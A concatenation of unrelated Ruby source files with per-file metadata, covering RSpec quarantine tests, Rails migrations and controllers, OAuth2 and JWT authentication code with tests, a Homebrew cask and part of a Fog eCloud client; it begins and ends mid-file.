end it 'executes before hooks of non-quarantined contexts' do executed_hooks = [] group = describe_successfully do before(:all) do executed_hooks << :before_all end before do executed_hooks << :before end example {} end expect(executed_hooks).to eq [:before_all, :before] expect(group.descendant_filtered_examples.first.execution_result.status).to eq(:passed) end end context 'with :quarantine focused' do before do described_class.configure_rspec RSpec.configure do |c| c.filter_run :quarantine end end it 'executes before hooks of quarantined contexts' do executed_hooks = [] group = describe_successfully('quarantine', :quarantine) do before(:all) do executed_hooks << :before_all end before do executed_hooks << :before end example {} end expect(executed_hooks).to eq [:before_all, :before] expect(group.descendant_filtered_examples.first.execution_result.status).to eq(:passed) end it 'skips before hooks of non-quarantined contexts' do executed_hooks = [] group = describe_successfully do before(:all) do executed_hooks << :before_all end before do executed_hooks << :before end example {} end expect(executed_hooks).to eq [] expect(group.descendant_filtered_examples.first).to be_nil end end end describe '.skip_or_run_quarantined_tests' do context 'with no tag focused' do before do described_class.configure_rspec end it 'skips 
quarantined tests' do group = describe_successfully do it('is pending', :quarantine) {} end expect(group.examples.first.execution_result.status).to eq(:pending) expect(group.examples.first.execution_result.pending_message) .to eq('In quarantine') end it 'executes non-quarantined tests' do group = describe_successfully do example {} end expect(group.examples.first.execution_result.status).to eq(:passed) end context 'quarantine message' do shared_examples 'test with quarantine message' do |quarantine_tag| it 'outputs the quarantine message' do group = describe_successfully do it('is quarantined', quarantine: quarantine_tag) {} end expect(group.examples.first.execution_result.pending_message) .to eq('In quarantine : for a reason') end end it_behaves_like 'test with quarantine message', 'for a reason' it_behaves_like 'test with quarantine message', { issue: 'for a reason', environment: [:nightly, :staging] } end end context 'with :quarantine focused' do before do described_class.configure_rspec RSpec.configure do |c| c.filter_run :quarantine end end it 'executes quarantined tests' do group = describe_successfully do it('passes', :quarantine) {} end expect(group.examples.first.execution_result.status).to eq(:passed) end it 'ignores non-quarantined tests' do group = describe_successfully do example {} end expect(group.examples.first.execution_result.status).to be_nil end end context 'with a non-quarantine tag focused' do before do described_class.configure_rspec RSpec.configure do |c| c.filter_run :foo end end it 'ignores non-quarantined non-focused tests' do group = describe_successfully do example {} end expect(group.examples.first.execution_result.status).to be_nil end it 'executes non-quarantined focused tests' do group = describe_successfully do it('passes', :foo) {} end expect(group.examples.first.execution_result.status).to be(:passed) end it 'ignores quarantined tests' do group = describe_successfully do it('is ignored', :quarantine) {} end expect(group.examples.first.execution_result.status).to be_nil end it 'skips quarantined focused tests' do group = describe_successfully do it('is pending', :quarantine, :foo) {} end expect(group.examples.first.execution_result.status).to be(:pending) expect(group.examples.first.execution_result.pending_message) .to eq('In quarantine') end end context 'with :quarantine and non-quarantine tags focused' do before do described_class.configure_rspec RSpec.configure do |c| c.filter_run :foo, :bar, :quarantine end end it 'ignores non-quarantined non-focused tests' do group = describe_successfully do example {} end expect(group.examples.first.execution_result.status).to be_nil end it 'skips non-quarantined focused tests' do group = describe_successfully do it('is pending', :foo) {} end expect(group.examples.first.execution_result.status).to be(:pending) expect(group.examples.first.execution_result.pending_message) .to eq('Only running tests tagged with :quarantine and any of [:bar, :foo]') end it 'skips quarantined non-focused tests' do group = describe_successfully do it('is pending', :quarantine) {} end expect(group.examples.first.execution_result.status).to be(:pending) end it 'executes quarantined focused tests' do group = describe_successfully do it('passes', :quarantine, :foo) {} end expect(group.examples.first.execution_result.status).to be(:passed) end end end end
avg_line_length: 29.606164
max_line_length: 96
alphanum_fraction: 0.638172
hexsha: abae97d32e8b9d025e2faf9f6ca7dc856435d02d
size: 495
content:

Paperclip::Attachment.default_options[:storage] = :qiniu
Paperclip::Attachment.default_options[:qiniu_credentials] = {
  :access_key => ENV['QINIU_ACCESS_KEY'] || raise("set env QINIU_ACCESS_KEY"),
  :secret_key => ENV['QINIU_SECRET_KEY'] || raise("set env QINIU_SECRET_KEY")
}
Paperclip::Attachment.default_options[:bucket] = 'paperclip-qiniu-example'
Paperclip::Attachment.default_options[:use_timestamp] = false
Paperclip::Attachment.default_options[:qiniu_host] = 'http://cdn.example.com'

avg_line_length: 49.5
max_line_length: 78
alphanum_fraction: 0.773737
hexsha: 1d49a16f3a6925df13c5f5618d5026a5299ce109
size: 423
content:

class CreateUserLessonTests < ActiveRecord::Migration[5.0]
  def change
    create_table :user_lesson_tests do |t|
      t.integer :user_id, null: false
      t.integer :lesson_id, null: false
      t.string :right_percent, null: false

      t.timestamps
    end

    add_index :user_lesson_tests, :user_id
    add_index :user_lesson_tests, [:user_id, :lesson_id], unique: true, name: 'index_on_user_lesson_tests'
  end
end

avg_line_length: 32.538462
max_line_length: 106
alphanum_fraction: 0.718676
hexsha: f7330529d497ed949421192b1ac346adc9823479
size: 3,281
content:

module SparkApi
  module Authentication
    module OAuth2Impl
      class GrantTypeBase
        GRANT_TYPES = [:authorization_code, :password, :refresh_token]

        def self.create(client, provider, session=nil)
          granter = nil
          case provider.grant_type
          when :authorization_code
            granter = GrantTypeCode.new(client, provider, session)
          when :password
            granter = GrantTypePassword.new(client, provider, session)
          # This method should only be used internally to the library
          when :refresh_token
            granter = GrantTypeRefresh.new(client, provider, session)
          else
            raise ClientError, "Unsupported grant type [#{provider.grant_type}]"
          end
          SparkApi.logger.debug { "[oauth2] setup #{granter.class.name}" }
          granter
        end

        attr_reader :provider, :client, :session

        def initialize(client, provider, session)
          @client = client
          @provider = provider
          @session = session
        end

        def authenticate
        end

        def refresh
        end

        protected

        def create_session(token_params)
          SparkApi.logger.debug { "[oauth2] create_session to #{provider.access_uri} params #{token_params}" }
          uri = URI.parse(provider.access_uri)
          request_path = "#{uri.path}"

          response = oauth_access_connection("#{uri.scheme}://#{uri.host}").post(request_path, "#{token_params}").body
          response.expires_in = provider.session_timeout if response.expires_in.nil?
          SparkApi.logger.debug { "[oauth2] New session created #{response}" }
          response
        rescue Faraday::ConnectionFailed => e
          if @client.ssl_verify && e.message =~ /certificate verify failed/
            SparkApi.logger.error { SparkApi::Errors.ssl_verification_error }
          end
          raise e
        end

        def needs_refreshing?
          !@session.nil? && !@session.refresh_token.nil? && @session.expired?
        end

        # Generate the appropriate request uri for authorizing this application for current user.
        def authorization_url()
          params = {
            "client_id" => @provider.client_id,
            "response_type" => "code",
            "redirect_uri" => @provider.redirect_uri
          }
          "#{@provider.authorization_uri}?#{build_url_parameters(params)}"
        end

        # Setup a faraday connection for dealing with an OAuth2 endpoint
        def oauth_access_connection(endpoint)
          opts = {
            :headers => @client.headers
          }
          opts[:ssl] = {:verify => false } unless @client.ssl_verify
          opts[:url] = endpoint
          conn = Faraday::Connection.new(opts) do |conn|
            conn.response :oauth2_impl
            conn.adapter Faraday.default_adapter
          end
        end

        def build_url_parameters(parameters={})
          array = parameters.map do |key,value|
            escaped_value = CGI.escape("#{value}")
            "#{key}=#{escaped_value}"
          end
          array.join "&"
        end
      end
    end
  end
end

avg_line_length: 34.904255
max_line_length: 118
alphanum_fraction: 0.574825
hexsha: 18c0c09113ff19d9fa53f902a4d267891f648540
size: 616
content:

class ProductsController < ApplicationController
  def index
    products = Product.all
    render json: products
  end

  def add_frame
    links = Product.new.add_frame(params[:publicId], params[:size], params[:orientation])
    render json: { link: links }
  end

  def add_print
    links = Product.new.add_print(params[:publicId], params[:size], params[:orientation])
    render json: { link: links }
  end

  def add_canvas
    links = Product.new.add_canvas(params[:publicId], params[:size], params[:orientation])
    render json: { link: links }
  end
end

avg_line_length: 23.692308
max_line_length: 94
alphanum_fraction: 0.637987
hexsha: edaa8053553992082a07d59d79520b5f919c3a41
size: 3,716
content:
# frozen_string_literal: true require_relative '../../../test_helper' SingleCov.covered! # needs Integration at the end for minitest-spec-rails describe 'Warden::Strategies::DoorkeeperStrategy Integration' do def perform_get(authorization) get path, headers: {HTTP_AUTHORIZATION: authorization} end def error JSON.parse(response.body).fetch("error") end let(:path) { +"/deploys/active_count.json" } let!(:user) { users(:admin) } let(:token) { Doorkeeper::AccessToken.create!(resource_owner_id: user.id, scopes: 'deploys') } let!(:valid_header) { "Bearer #{token.token}" } it "logs the user in" do perform_get valid_header assert_response :success, response.body end it "does not set a session since oauth requests are not supposed to log in a browser" do perform_get valid_header response.headers['Set-Cookie'].must_be_nil end it "does not check and fails without header" do assert_sql_queries(0) { perform_get nil } error.must_equal "You are not logged in, see docs/api.md on how to authenticate" assert_response :unauthorized end it "checks and fails with invalid header" do assert_sql_queries(1) { perform_get(valid_header + Base64.encode64('foo')) } error.must_equal "Bearer token is invalid" assert_response :unauthorized end it "checks and fails with unfound user" do user.delete assert_sql_queries(3) { perform_get(valid_header) } # FYI queries are: find token, revoke token, find user error.must_equal "Bearer token belongs to deleted user #{user.id}" assert_response :unauthorized end it "checks and fails with missing scope access" do token.update_column(:scopes, 'foobar') assert_sql_queries(2) { perform_get(valid_header) } # FYI queries are: find token, revoke token error.must_equal "Bearer token needs scope default or deploys" assert_response :unauthorized end describe "when accessing web-ui" do let(:path) { "/profile" } it "checks and fails when using restricted token" do perform_get(valid_header) error.must_equal "Bearer token needs scope default or profiles" assert_response :unauthorized end it "logs the user in when using efault token" do token.update_column(:scopes, "default") perform_get(valid_header) assert_response :success, response.body end it "logs the user in when using controller specific token" do token.update_column(:scopes, "profiles") perform_get(valid_header) assert_response :success, response.body end end it "checks and fails with expired token" do token.update(expires_in: 1, created_at: 1.day.ago) assert_sql_queries(2) { perform_get(valid_header) } # FYI queries are: find token, revoke token error.must_equal "Bearer token is expired" assert_response :unauthorized end it "does not check and fails with non matching header" do assert_sql_queries(0) { perform_get "oops" + valid_header } error.must_equal "You are not logged in, see docs/api.md on how to authenticate" assert_response :unauthorized end describe "last_used_at" do it "tracks when previously unset" do perform_get valid_header token.reload.last_used_at.must_be :>, 2.seconds.ago end it "does not update when recent to avoid db overhead" do old = 10.seconds.ago token.update_column(:last_used_at, old) perform_get valid_header token.reload.last_used_at.to_s.must_equal old.to_s end it "updates when old" do old = 1.hour.ago token.update_column(:last_used_at, old) perform_get valid_header token.reload.last_used_at.must_be :>, 2.seconds.ago end end end
avg_line_length: 32.884956
max_line_length: 110
alphanum_fraction: 0.718784
hexsha: bb241dc15dbaf7077ebc6bcdf32a2759720d9ad6
size: 526
content:

class CreateSubscriptionCountries < ActiveRecord::Migration
  def self.up
    create_table :subscription_countries do |t|
      t.integer :subscription_id, :null => false
      t.integer :country_id, :null => false
      t.decimal :price, :null => false, :default => 0
      t.decimal :price_over_threshold, :null => false, :default => 0

      t.timestamps
    end

    add_index :subscription_countries, [:subscription_id, :country_id], :unique => true
  end

  def self.down
    drop_table :subscription_countries
  end
end

avg_line_length: 29.222222
max_line_length: 87
alphanum_fraction: 0.693916
hexsha: f833ab238cadfe4af6b2a06763290b43eed7f84c
size: 1,803
content:

class LwtAuthenticationSystemGenerator < Rails::Generator::Base
  #TODO: update classes of they exists?
  #TODO: Add routes?
  #TODO: Add tests

  def manifest
    record do |m|
      m.directory File.join( *%w{ app controllers } )
      m.directory File.join( *%w{ app models } )
      m.directory File.join( *%w{ app views user_reminder_mailer } )
      m.directory File.join( *%w{ app views users } )
      m.directory File.join( *%w{ spec fixtures } )
      m.directory File.join( *%w{ db migrate } )

      m.template 'app/controllers/login_controller.rb', File.join( *%w{ app controllers users_controller.rb } )
      m.template 'app/models/model.rb', File.join( *%w{ app models user.rb } )
      m.template 'app/views/user_reminder_mailer/reminder.html.erb', File.join( *%W{ app views user_reminder_mailer reminder.html.erb } )
      m.template 'app/views/users/login.html.erb', File.join( *%W{ app views users login.html.erb } )
      m.template 'app/views/users/profile.html.erb', File.join( *%W{ app views users profile.html.erb } )
      m.template 'app/views/users/reminder.html.erb', File.join( *%W{ app views users reminder.html.erb } )
      m.template 'app/views/users/signup.html.erb', File.join( *%W{ app views users signup.html.erb } )
      m.template 'spec/fixtures/groups.yml', File.join( *%w{ spec fixtures groups.yml } )
      m.template 'spec/fixtures/groups_privileges.yml', File.join( *%w{ spec fixtures groups_privileges.yml } )
      m.template 'spec/fixtures/privileges.yml', File.join( *%w{ spec fixtures privileges.yml } )
      m.template 'spec/fixtures/users.yml', File.join( *%w{ spec fixtures users.yml } )

      m.migration_template 'db/migrate/migration.rb', File.join( *%w{ db migrate } ),
        :migration_file_name => "add_lwt_authentication_system"
    end
  end
end

avg_line_length: 60.1
max_line_length: 141
alphanum_fraction: 0.681642
hexsha: 611a3e6e34593754cc05492742ac86e43d9e4a88
size: 540
content:

cask 'simply-fortran' do
  version '3.6.3116'
  sha256 '9c3a9d94f76fdc55d724ed3f87e4798508665cddb730aeaf496b0c3b98bf6b65'

  # download.approximatrix.com/simplyfortran was verified as official when first introduced to the cask
  url "http://download.approximatrix.com/simplyfortran/#{version.major_minor}/simplyfortran-#{version}.dmg"
  appcast 'https://simplyfortran.com/download/?platform=macos',
          configuration: version.major_minor
  name 'Simply Fortran'
  homepage 'https://simplyfortran.com/'

  app 'Simply Fortran.app'
end

avg_line_length: 38.571429
max_line_length: 107
alphanum_fraction: 0.77963
hexsha: 5d23037464318a349e316626d675c643e0c76402
size: 1,082
content:

# frozen_string_literal: true

require 'elastic_apm/span_helpers'

module ElasticAPM
  RSpec.describe SpanHelpers do
    class Thing
      include ElasticAPM::SpanHelpers

      def do_the_thing
        'ok'
      end
      span_method :do_the_thing

      def self.do_all_things
        'all ok'
      end
      span_class_method :do_all_things
    end

    context 'on class methods', :intercept do
      it 'wraps in a span' do
        ElasticAPM.start

        ElasticAPM.with_transaction do
          Thing.do_all_things
        end

        ElasticAPM.stop

        expect(@intercepted.spans.length).to be 1
        expect(@intercepted.spans.last.name).to eq 'do_all_things'
      end
    end

    context 'on instance methods', :intercept do
      it 'wraps in a span' do
        thing = Thing.new

        ElasticAPM.start

        ElasticAPM.with_transaction do
          thing.do_the_thing
        end

        ElasticAPM.stop

        expect(@intercepted.spans.length).to be 1
        expect(@intercepted.spans.last.name).to eq 'do_the_thing'
      end
    end
  end
end

avg_line_length: 20.037037
max_line_length: 66
alphanum_fraction: 0.631238
hexsha: ab6d8d3774f5aec6ca365f6710d902ad01413cf7
size: 2,382
content:

require 'rails_helper'

describe 'assignments/new.html.slim', type: :view do
  let(:unassigned_case) { create :case }
  let(:bg)  { create :business_group }
  let(:dir) { create :directorate, business_group: bg }
  let!(:business_unit_1) { create :responding_team, directorate: dir }
  let!(:business_unit_2) { create :responding_team, directorate: dir }
  let!(:business_unit_3) { create :responding_team, directorate: dir }

  it 'displays the new assignment page for a new case' do
    assign(:case, unassigned_case)
    assign(:assignment, unassigned_case.assignments.new)
    flash[:notice] = true
    assign(:creating_case, true)

    render
    assignments_new_page.load(rendered)

    page = assignments_new_page

    expect(page.page_heading.heading.text).to eq "Assign case"
    expect(page.page_heading.sub_heading.text)
        .to eq "Create case "

    expect(page.business_groups).to have_group
    expect(page.business_groups).to have_all_groups
    expect(page).to have_no_assign_to
  end

  context 'User has selected a specific business group or viewing all' do
    it 'displays the new assignment page with business units' do
      assign(:case, unassigned_case)
      assign(:assignment, unassigned_case.assignments.new)
      flash[:notice] = true
      assign(:creating_case, true)
      assign(:business_units, dir.business_units)

      render
      assignments_new_page.load(rendered)

      page = assignments_new_page

      expect(page.page_heading.heading.text).to eq "Assign case"
      expect(page.page_heading.sub_heading.text)
          .to eq "Create case "

      expect(page.business_groups).to have_group
      expect(page.business_groups).to have_all_groups
      expect(page.assign_to.team.count).to eq 3

      dir.business_units.each do | bu |
        page_team = page.assign_to.team.detect { |team| team.business_unit.text == bu.name }
        expect(page_team.areas_covered.map(&:text))
            .to match_array bu.areas.map(&:value)
        expect(page_team.deputy_director.text).to eq bu.team_lead
        expect(page_team.assign_link.text).to eq "Assign to this unit"
        expect(page_team.assign_link[:href])
            .to eq assign_to_responder_team_case_assignments_path(
                     unassigned_case,
                     team_id: bu.id
                   )
      end
    end
  end
end

avg_line_length: 30.935065
max_line_length: 92
alphanum_fraction: 0.68178
hexsha: 33549a4946ceecba58dd4a5a3e6190de4b0cdb5c
size: 1,814
content:

module Spec
  module Mocks
    class Mock
      include Methods

      # Creates a new mock with a +name+ (that will be used in error messages
      # only)
      # == Options:
      # * <tt>:null_object</tt> - if true, the mock object acts as a forgiving
      #   null object allowing any message to be sent to it.
      def initialize(name, stubs_and_options={})
        @name = name
        @options = parse_options(stubs_and_options)
        assign_stubs(stubs_and_options)
      end

      # This allows for comparing the mock to other objects that proxy such as
      # ActiveRecords belongs_to proxy objects By making the other object run
      # the comparison, we're sure the call gets delegated to the proxy target
      # This is an unfortunate side effect from ActiveRecord, but this should
      # be safe unless the RHS redefines == in a nonsensical manner
      def ==(other)
        other == __mock_proxy
      end

      def method_missing(sym, *args, &block)
        __mock_proxy.instance_eval {@messages_received << [sym, args, block]}
        begin
          return self if __mock_proxy.null_object?
          super(sym, *args, &block)
        rescue NameError
          __mock_proxy.raise_unexpected_message_error sym, *args
        end
      end

      def inspect
        "#<#{self.class}:#{sprintf '0x%x', self.object_id} @name=#{@name.inspect}>"
      end

      def to_s
        inspect.gsub('<','[').gsub('>',']')
      end

      private

      def parse_options(options)
        options.has_key?(:null_object) ? {:null_object => options.delete(:null_object)} : {}
      end

      def assign_stubs(stubs)
        stubs.each_pair do |message, response|
          stub!(message).and_return(response)
        end
      end
    end
  end
end

avg_line_length: 31.824561
max_line_length: 94
alphanum_fraction: 0.606395
hexsha: 21d4be7bfb947a12cbdecc70c3b7eb0c82c1c503
size: 392
content:

require "chef/config"
require_relative "with_pattern"

module Cheffish
  class ChefRunData
    def initialize(config)
      @local_servers = []
      @current_chef_server = Cheffish.default_chef_server(config)
    end

    extend Cheffish::WithPattern
    with :data_bag
    with :environment
    with :data_bag_item_encryption
    with :chef_server

    attr_reader :local_servers
  end
end

avg_line_length: 19.6
max_line_length: 65
alphanum_fraction: 0.732143
hexsha: 1d36ff12892261cbc7e08c11f596c86a2d249312
size: 2,713
content:

# frozen_string_literal: true

require 'stringio'

module API::V2
  module Management
    class JWTAuthenticationMiddleware < Grape::Middleware::Base
      extend Memoist
      mattr_accessor :security_configuration

      def before
        return if request.path == '/api/v2/management/swagger'

        check_request_method!
        check_query_parameters!
        check_content_type!

        payload = check_jwt!(jwt)

        env['rack.input'] = StringIO.new(payload.fetch(:data, {}).to_json)
      end

      private

      def request
        Grape::Request.new(env)
      end
      memoize :request

      def jwt
        JSON.parse(request.body.read)
      rescue StandardError => e
        raise Exceptions::Authentication, \
              message: 'Couldn\'t parse JWT.',
              debug_message: e.inspect,
              status: 400
      end
      memoize :jwt

      def check_request_method!
        return if request.post? || request.put?

        raise Exceptions::Authentication, \
              message: 'Only POST and PUT verbs are allowed.',
              status: 405
      end

      def check_query_parameters!
        return if request.GET.empty?

        raise Exceptions::Authentication, \
              message: 'Query parameters are not allowed.',
              status: 400
      end

      def check_content_type!
        return if request.content_type == 'application/json'

        raise Exceptions::Authentication, \
              message: 'Only JSON body is accepted.',
              status: 400
      end

      def check_jwt!(jwt)
        begin
          scope = security_configuration.fetch(:scopes).fetch(security_scope)
          keychain = security_configuration
                     .fetch(:keychain)
                     .slice(*scope.fetch(:permitted_signers))
                     .each_with_object({}) { |(k, v), memo| memo[k] = v.fetch(:value) }
          result = JWT::Multisig.verify_jwt(jwt, keychain, security_configuration.fetch(:jwt, {}))
        rescue StandardError => e
          Rails.logger.error "ManagementAPI check_jwt error: #{e.inspect}"
          raise Exceptions::Authentication, \
                message: 'Failed to verify JWT.',
                debug_message: e.inspect,
                status: 401
        end

        unless (scope.fetch(:mandatory_signers) - result[:verified]).empty?
          raise Exceptions::Authentication, \
                message: 'Not enough signatures for the action.',
                status: 401
        end

        result[:payload]
      end

      def security_scope
        request.env['api.endpoint'].options.fetch(:route_options).fetch(:scope)
      end
    end
  end
end

avg_line_length: 28.861702
max_line_length: 100
alphanum_fraction: 0.58017
hexsha: bff4b8018df53eff06f3a1dee45197e64a98179d
size: 978
content:

# threes mode puzzles
class GameModes::ThreeController < ApplicationController

  def index
    render "game_modes/three"
  end

  # json endpoint for fetching puzzles on initial pageload
  def puzzles
    render json: {
      # This uses the same puzzle pool as Haste mode
      puzzles: HastePuzzle.random_level(100).as_json(lichess_puzzle_id: true)
    }
  end

  # player has completed a three round
  def complete
    score = completed_three_round_params[:score].to_i
    if user_signed_in?
      if score > 0
        current_user.completed_three_rounds.create!(score: score)
      end
      best = current_user.best_three_score(Date.today)
    else
      best = score
    end
    render json: {
      score: score,
      best: best,
      high_scores: CompletedThreeRound.high_scores(24.hours.ago).map do |user, score|
        [user.username, score]
      end
    }
  end

  private

  def completed_three_round_params
    params.require(:three).permit(:score)
  end
end

avg_line_length: 22.744186
max_line_length: 85
alphanum_fraction: 0.686094
hexsha: 39ea9118adbb3fd7713eeb9d6621206b635e1c82
size: 996
content:

#
# Copyright 2019 ThoughtWorks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

module Admin
  module PipelinesHelper
    include JavaImports

    def default_stage_config
      job_configs = JobConfigs.new([JobConfig.new(CaseInsensitiveString.new("defaultJob"), ResourceConfigs.new, ArtifactConfigs.new, com.thoughtworks.go.config.Tasks.new([AntTask.new].to_java(Task)))].to_java(JobConfig))
      StageConfig.new(CaseInsensitiveString.new("defaultStage"), job_configs)
    end
  end
end

avg_line_length: 36.888889
max_line_length: 220
alphanum_fraction: 0.764056
hexsha: 62cc2b3663fbf0e3fa3368a816c7c62278b0dadf
size: 37,997
content:
require File.expand_path("../ecloud/models/model", __FILE__) require File.expand_path("../ecloud/models/collection", __FILE__) require File.expand_path("../ecloud/errors", __FILE__) module Fog module Compute class Ecloud < Fog::Service API_URL = "https://services.enterprisecloud.terremark.com" attr_reader :authentication_method, :version #### Credentials # requires recognizes :ecloud_username, :ecloud_password, :ecloud_version, :ecloud_access_key, :ecloud_private_key, :ecloud_authentication_method, :base_path #### Models model_path "fog/compute/ecloud/models/" model :organization collection :organizations model :location collection :locations model :catalog_item collection :catalog model :catalog_configuration collection :catalog_configurations model :environment collection :environments model :task collection :tasks model :compute_pool collection :compute_pools model :server collection :servers model :virtual_machine_assigned_ip collection :virtual_machine_assigned_ips model :hardware_configuration collection :hardware_configurations model :server_configuration_option collection :server_configuration_options model :guest_process collection :guest_processes model :layout collection :layouts model :row collection :rows model :group collection :groups model :internet_service collection :internet_services model :node collection :nodes model :monitor collection :monitors model :cpu_usage_detail collection :cpu_usage_detail_summary model :memory_usage_detail collection :memory_usage_detail_summary model :storage_usage_detail collection :storage_usage_detail_summary model :operating_system_family collection :operating_system_families model :operating_system collection :operating_systems model :template collection :templates model :firewall_acl collection :firewall_acls model :network collection :networks model :ip_address collection :ip_addresses model :physical_device collection :physical_devices model :public_ip collection :public_ips model :trusted_network_group collection :trusted_network_groups model :backup_internet_service collection :backup_internet_services model :rnat collection :rnats model :association collection :associations model :tag collection :tags model :admin_organization collection :admin_organizations model :ssh_key collection :ssh_keys model :password_complexity_rule collection :password_complexity_rules model :authentication_level collection :authentication_levels model :login_banner collection :login_banners model :user collection :users model :role collection :roles model :ssh_key collection :ssh_keys model :support_ticket collection :support_tickets model :detached_disk collection :detached_disks #### Requests request_path "fog/compute/ecloud/requests/" request :backup_internet_service_create request :backup_internet_service_delete request :backup_internet_service_edit request :compute_pool_edit request :firewall_acls_create request :firewall_acls_delete request :get_admin_organization request :get_api_key request :get_api_keys request :get_association request :get_associations request :get_authentication_level request :get_authentication_levels request :get_backup_internet_service request :get_backup_internet_services request :get_catalog request :get_catalog_configuration request :get_catalog_configurations request :get_catalog_item request :get_compute_pool request :get_compute_pools request :get_cpu_usage_detail request :get_cpu_usage_detail_summary request :get_environment request :get_firewall_acl request :get_firewall_acls request :get_group request :get_groups 
request :get_guest_process request :get_guest_processes request :get_hardware_configuration request :get_internet_service request :get_internet_services request :get_ip_address request :get_layout request :get_layouts request :get_location request :get_locations request :get_login_banner request :get_login_banners request :get_memory_usage_detail request :get_memory_usage_detail_summary request :get_monitor request :get_monitors request :get_network request :get_network_summary request :get_networks request :get_node request :get_nodes request :get_operating_system request :get_operating_system_families request :get_organization request :get_organizations request :get_password_complexity_rule request :get_password_complexity_rules request :get_physical_device request :get_physical_devices request :get_public_ip request :get_public_ips request :get_rnat request :get_rnats request :get_role request :get_roles request :get_row request :get_rows request :get_server request :get_server_configuration_option request :get_server_configuration_options request :get_servers request :get_ssh_key request :get_ssh_keys request :get_storage_usage_detail request :get_storage_usage_detail_summary request :get_support_ticket request :get_support_tickets request :get_tag request :get_tags request :get_task request :get_tasks request :get_template request :get_templates request :get_trusted_network_group request :get_trusted_network_groups request :get_user request :get_users request :get_virtual_machine_assigned_ips request :get_detached_disks request :get_detached_disk request :groups_create request :groups_delete request :groups_edit request :groups_movedown request :groups_moveup request :internet_service_create request :internet_service_delete request :internet_service_edit request :monitors_create_default request :monitors_create_ecv request :monitors_create_http request :monitors_create_loopback request :monitors_create_ping request :monitors_disable request :monitors_edit_ecv request :monitors_edit_http request :monitors_edit_ping request :monitors_enable request :node_service_create request :node_service_delete request :node_service_edit request :power_off request :power_on request :power_reset request :power_shutdown request :public_ip_activate request :rnat_associations_create_device request :rnat_associations_delete request :rnat_associations_edit_network request :rows_create request :rows_delete request :rows_edit request :rows_movedown request :rows_moveup request :ssh_key_create request :ssh_key_delete request :ssh_key_edit request :trusted_network_groups_create request :trusted_network_groups_delete request :trusted_network_groups_edit request :virtual_machine_edit_assigned_ips request :virtual_machine_copy request :virtual_machine_copy_identical request :virtual_machine_create_from_template request :virtual_machine_delete request :virtual_machine_edit request :virtual_machine_edit_hardware_configuration request :virtual_machine_import request :virtual_machine_upload_file request :virtual_machine_detach_disk request :virtual_machine_attach_disk module Shared attr_accessor :base_path attr_reader :versions_uri def validate_data(required_opts = [], options = {}) unless required_opts.all? 
{ |opt| options.key?(opt) } raise ArgumentError.new("Required data missing: #{(required_opts - options.keys).map(&:inspect).join(', ')}") end end def id_from_uri(uri) uri.match(/(\d+)$/)[1].to_i end def default_organization_uri "#{@base_path}/organizations" end end class Real include Shared include Errors class Fog::Compute::Ecloud::ServiceError < Fog::Ecloud::Errors::ServiceError; end class << self def basic_request(name, expects = [200], method = :get, headers = {}, body = "") define_method(name) do |uri| request( :expects => expects, :method => method, :headers => headers, :body => body, :parse => true, :uri => uri ) end end end def initialize(options = {}) @base_path = options[:base_path] || "/cloudapi/ecloud" @connections = {} @connection_options = options[:connection_options] || {} @host = options[:ecloud_host] || API_URL @persistent = options[:persistent] || false @version = options[:ecloud_version] || "2015-05-01" @authentication_method = options[:ecloud_authentication_method] || :cloud_api_auth @access_key = options[:ecloud_access_key] @private_key = options[:ecloud_private_key] if @private_key.nil? || @authentication_method == :basic_auth @authentication_method = :basic_auth @username = options[:ecloud_username] @password = options[:ecloud_password] if @username.nil? || @password.nil? raise ArgumentError, "No credentials (cloud auth, or basic auth) passed!" end else if @access_key.nil? raise ArgumentError, "Incomplete cloud auth credentials supplied!" end @private_key = @private_key.to_s @access_key = @access_key.to_s @hmac = Fog::HMAC.new("sha256", @private_key) end end def request(params) # Convert the uri to a URI if it's a string. if params[:uri].is_a?(String) params[:uri] = URI.parse(@host + params[:uri]) end host_url = "#{params[:uri].scheme}://#{params[:uri].host}#{params[:uri].port ? ":#{params[:uri].port}" : ''}" # Hash connections on the host_url ... There"s nothing to say we won"t get URI"s that go to # different hosts. @connections[host_url] ||= Fog::XML::Connection.new(host_url, @persistent, @connection_options) # Set headers to an empty hash if none are set. headers = set_extra_headers_for(params) || set_extra_headers_for({}) # Make the request options = { :expects => (params[:expects] || 200), :method => params[:method] || "GET", :path => params[:uri].path + "#{"?#{params[:uri].query}" if params[:uri].query}", :headers => headers } unless params[:body].nil? || params[:body].empty? options.merge!(:body => params[:body]) end begin response = @connections[host_url].request(options) rescue Excon::Errors::Error => error raise ServiceError.slurp(error) end # Parse the response body into a hash unless response.body.empty? if params[:parse] document = Fog::ToHashDocument.new parser = Nokogiri::XML::SAX::PushParser.new(document) parser << response.body parser.finish response.body = document.body end end response end private # if Authorization and x-tmrk-authorization are used, the x-tmrk-authorization takes precendence. 
def set_extra_headers_for(params) length_required = ["PUT", "POST", "DELETE"] params[:headers] = { "x-tmrk-version" => @version, "Date" => Time.now.utc.strftime("%a, %d %b %Y %H:%M:%S GMT"), }.merge(params[:headers] || {}) if length_required.include?(params[:method]) && !params[:headers]["Content-Length"] body_size = 0 if params[:body] body_size = params[:body].size end params[:headers].merge!("Content-Length" => body_size) end if params[:method] == "POST" || params[:method] == "PUT" params[:headers].merge!("Content-Type" => "application/xml") unless params[:headers]["Content-Type"] params[:headers].merge!("Accept" => "application/xml") end unless params[:body].nil? || params[:body].empty? params[:headers].merge!("x-tmrk-contenthash" => "Sha256 #{Base64.encode64(Digest::SHA2.digest(params[:body].to_s)).chomp}") end if @authentication_method == :basic_auth params[:headers].merge!("Authorization" => "Basic #{Base64.encode64(@username + ":" + @password).delete("\r\n")}") elsif @authentication_method == :cloud_api_auth signature = cloud_api_signature(params) params[:headers].merge!( "x-tmrk-authorization" => %{CloudApi AccessKey="#{@access_key}" SignatureType="HmacSha256" Signature="#{signature}"}, "Authorization" => %{CloudApi AccessKey="#{@access_key}" SignatureType="HmacSha256" Signature="#{signature}"} ) end params[:headers] end def cloud_api_signature(params) verb = params[:method].to_s.upcase headers = params[:headers] path = params[:uri].path + "#{"?#{params[:uri].query}" if params[:uri].query}" canonicalized_headers = canonicalize_headers(headers) canonicalized_resource = canonicalize_resource(path) string = [ verb, headers["Content-Length"].to_s, headers["Content-Type"].to_s, headers["Date"].to_s, 